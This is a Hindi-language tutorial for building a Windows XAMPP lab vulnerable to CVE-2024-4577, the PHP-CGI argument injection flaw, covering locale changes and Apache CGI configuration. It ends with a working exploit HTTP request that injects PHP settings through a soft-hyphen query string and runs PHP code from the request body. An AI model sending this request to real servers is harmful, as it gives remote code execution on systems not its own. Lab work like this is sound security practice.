
CVE-2024-4577 के लिए लैब बनाएं
| CVE-2024-4577 | PHP-CGI आर्गुमेंट इंजेक्शन भेद्यता | 9.8 |
"CVE-2024-4577 PHP में एक गंभीर आर्गुमेंट इंजेक्शन भेद्यता है जिसका शोषण करके दूरस्थ कोड निष्पादन (RCE) प्राप्त किया जा सकता है। DEVCORE के शोधकर्ताओं के अनुसार, यह दोष कैरेक्टर एन्कोडिंग रूपांतरणों में त्रुटियों का परिणाम है, जो विंडोज़ पर “Best Fit” सुविधा को प्रभावित करता है।"
-Tenable
डाउनलोड करें XAMPP (8.1.25 / PHP 8.1.25) XAMPP स्थापित करने के बाद, php संस्करण जांचें। यह 8.1.25 होना चाहिए। php संस्करण को कमांड लाइन से "php -v" कमांड चलाकर जांचा जा सकता है। यदि यह त्रुटि देता है, तो इसे php PATH वेरिएबल में जोड़ा जाना चाहिए।
लोकेल बदलने की आवश्यकता है। ऐसा करने के लिए, Control Panel > Clock and Region > Region पर जाएं। प्रारूप को Japanese, Traditional Chinese, या Simplified Chinese पर सेट करें। Administrative > Change system locale पर क्लिक करें और उपयुक्त लोकेल चुनें।
यदि PHP cgi मोड में नहीं चलता है, तो आपको ये सेटिंग्स करनी चाहिए।
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php
<Directory "C:/xampp/php">
Options +ExecCGI
AllowOverride None
Require all granted
</Directory>
LoadModule php_module "C:/xampp/php/php8apache2_4.dll" खोजें। पंक्ति की शुरुआत में '#' लगाएं।परिवर्तनों को सहेजें और apache इंस्टेंस शुरू करें।
यदि नीचे दिए गए POST अनुरोध के बॉडी में भेजे गए PHP कोड का आउटपुट प्रतिक्रिया में दिखाई देता है, तो शोषण चरण सफल होता है।
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
echo "vulnerable";
?>
यह प्रयोगशाला वातावरण केवल शैक्षिक उद्देश्यों के लिए है और इसे लाइव वातावरण में उपयोग नहीं किया जाना चाहिए। अनुचित उपयोग के परिणामस्वरूप होने वाली किसी भी क्षति या हानि के लिए मैं जिम्मेदार नहीं हूं। उपयोगकर्ताओं को इस वातावरण का उपयोग अपने जोखिम पर करना चाहिए।